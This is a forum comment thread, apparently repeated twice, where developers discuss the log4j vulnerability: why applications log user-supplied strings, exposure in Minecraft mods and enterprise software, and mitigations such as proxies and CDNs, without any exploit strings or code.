As I understand it from other articles, in most cases they aren't logging user input in the sense that users typed stuff into a form and that text was logged; they are logging data, like user-agent example mentioned above, that is normally automatically generated but can be manually sent by malicious actors.
I say in most cases, because one blog I read mentioned that some of this enterprise software was using the library to explicitly log suspicious text manually entered by users, like strange input being put into username/password fields. Ironically enough, this was being done to try and catch malicious actors attempting to hack the site.
My main question is why would you log stuff that could potentially inject this kind of the thing?
Most devs using the library probably didn't even know the library could execute strings. Which is totally understandable, because who in their right mind would ever think a logging library would do that.
So question that pops up right on top if it is: Is this really that huge of a problem?
I'm not a Java guy, but I've got a few years experience modding Minecraft, which uses the library. Thinking back, I've seen a few cases where this could be exploited in moderately popular mods.
For example, Forge, the defacto Minecraft modding framework, allows inter-mod communication and more than a few times I've seen mods log these strings if they don't match the expected patterns. So there is any Minecraft server compromised if a malicious mod is installed.
In another example, the game has slash commands in chat and I've seen more than a few mods that log the text of malformed commands and I wouldn't be surprised if some of the built in ones do as well. With that there is a server compromised by any malicious user that logs on and chats.
Granted, this is just a game, but as far as games go Minecraft is big business and one where there are plenty of griefers ready and willing to take advantage.
I assumed, when logging, companies log descriptive info. For example if someone is trying something funny than "this IP or this user is hitting this endpoint too much..." or something like that.
Ah, there's the problem, we're talking about Enterprise software here. You should always assume that the project was outsource to underpaid interns that barely understand the problem domain, will ignore the spec, and who think programming is throwing copy/pasted stackoverflow answers at the wall until the client goes away, the company goes bankrupt, or they move on to their next job.
In other words...
Is this really that huge of a problem?
Oh yea, you can bet money that to some level this vulnerability sits in just about every major Java code base at every major Java company that uses log4j. One could probably start an international sports league with the number of devs who just learned log4j could do this and are now rushing to fix their various products.
Thanks for the great input. Regarding "is this that huge of a problem" I'm from technical point of view not business. Bad decisions were made and of course it is but question is why? Regarding loging user browser or such, again why? If there's a problem ask user for that data; why collect the data beforhand? It all boils down again to the obsessive analitics that spend more money for collection and data processing than it brings value to the business. But what do I know, right? There's a reason these managers are paid good money to make us do these things right?
I fully agree, logger should just logg. But one more thing just to be realistic about imapct area: in cloud era don't people use proxies to log network stuff? Like fire up java apps in kubernetes and let proxies log data like that before the app is even hit? Again making app log only descripitve part when you actually have to.
Reading posts from devs finding and patching these issues in their projects, the answer to "why" these things were being logged is as varied as the codebases. There is definitely too many cases of some pointy hair manager demanding more analytics to impress their even pointier haired bosses, but in many cases it is the normal reasons any dev logs anything, to help ensure the code is running correctly.
To all your very reasonable questions asking "but don't they do X"... unfortunately, nine times out of ten, the answer is, yes, that is what they should do, but, no, that isn't what they do.
If you have any illusion that these big tech companies are bastions of best practices and clean code, just go read the archives on dailyWTF or rants on devrant. There is a reason that calling something Enterprise SoftwareTM is considered an insult.
The main grunt of this problem will be felt by companies using interns and underpaid devs in small org like local banks and several other IT services.
Big tech giants are well aware to push a fix immediately, but you can't expect every small scale startup to know and fix this immediately. And, if you're small a attack as simple as this will blow out your company.
I hope everyone uses Cloudflare or some other CDNs because Cloudflare has begun handling malicious user strings even for its free plan.
For further actions, you may consider blocking this person and/or reporting abuse
As I understand it from other articles, in most cases they aren't logging user input in the sense that users typed stuff into a form and that text was logged; they are logging data, like user-agent example mentioned above, that is normally automatically generated but can be manually sent by malicious actors.
I say in most cases, because one blog I read mentioned that some of this enterprise software was using the library to explicitly log suspicious text manually entered by users, like strange input being put into username/password fields. Ironically enough, this was being done to try and catch malicious actors attempting to hack the site.
Most devs using the library probably didn't even know the library could execute strings. Which is totally understandable, because who in their right mind would ever think a logging library would do that.
I'm not a Java guy, but I've got a few years experience modding Minecraft, which uses the library. Thinking back, I've seen a few cases where this could be exploited in moderately popular mods.
For example, Forge, the defacto Minecraft modding framework, allows inter-mod communication and more than a few times I've seen mods log these strings if they don't match the expected patterns. So there is any Minecraft server compromised if a malicious mod is installed.
In another example, the game has slash commands in chat and I've seen more than a few mods that log the text of malformed commands and I wouldn't be surprised if some of the built in ones do as well. With that there is a server compromised by any malicious user that logs on and chats.
Granted, this is just a game, but as far as games go Minecraft is big business and one where there are plenty of griefers ready and willing to take advantage.
Ah, there's the problem, we're talking about Enterprise software here. You should always assume that the project was outsource to underpaid interns that barely understand the problem domain, will ignore the spec, and who think programming is throwing copy/pasted stackoverflow answers at the wall until the client goes away, the company goes bankrupt, or they move on to their next job.
In other words...
Oh yea, you can bet money that to some level this vulnerability sits in just about every major Java code base at every major Java company that uses log4j. One could probably start an international sports league with the number of devs who just learned log4j could do this and are now rushing to fix their various products.
Thanks for the great input. Regarding "is this that huge of a problem" I'm from technical point of view not business. Bad decisions were made and of course it is but question is why? Regarding loging user browser or such, again why? If there's a problem ask user for that data; why collect the data beforhand? It all boils down again to the obsessive analitics that spend more money for collection and data processing than it brings value to the business. But what do I know, right? There's a reason these managers are paid good money to make us do these things right?
I fully agree, logger should just logg. But one more thing just to be realistic about imapct area: in cloud era don't people use proxies to log network stuff? Like fire up java apps in kubernetes and let proxies log data like that before the app is even hit? Again making app log only descripitve part when you actually have to.
Reading posts from devs finding and patching these issues in their projects, the answer to "why" these things were being logged is as varied as the codebases. There is definitely too many cases of some pointy hair manager demanding more analytics to impress their even pointier haired bosses, but in many cases it is the normal reasons any dev logs anything, to help ensure the code is running correctly.
To all your very reasonable questions asking "but don't they do X"... unfortunately, nine times out of ten, the answer is, yes, that is what they should do, but, no, that isn't what they do.
If you have any illusion that these big tech companies are bastions of best practices and clean code, just go read the archives on dailyWTF or rants on devrant. There is a reason that calling something Enterprise SoftwareTM is considered an insult.
The main grunt of this problem will be felt by companies using interns and underpaid devs in small org like local banks and several other IT services.
Big tech giants are well aware to push a fix immediately, but you can't expect every small scale startup to know and fix this immediately. And, if you're small a attack as simple as this will blow out your company.
I hope everyone uses Cloudflare or some other CDNs because Cloudflare has begun handling malicious user strings even for its free plan.